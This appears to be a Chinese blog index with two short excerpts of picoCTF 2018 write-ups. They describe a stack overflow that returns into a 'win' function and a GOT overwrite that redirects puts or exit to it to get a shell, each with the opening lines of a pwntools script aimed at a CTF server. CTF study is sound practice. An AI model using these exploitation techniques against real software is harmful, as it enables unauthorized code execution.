摘要:
picoctf_2018_buffer overflow 1 vlun函数存在栈溢出,直接栈溢出到win函数即可 from pwn import * r=remote('node3.buuoj.cn',25153) elf=ELF('./PicoCTF_2018_buffer_overflow_1' 阅读全文
摘要:
win是后门函数,将win的地址覆写到puts@got或者exit@got,后面执行puts或exit的时候直接跳转到win函数来getshell from pwn import * r=remote('node3.buuoj.cn',29217) #r=process('./PicoCTF_201 阅读全文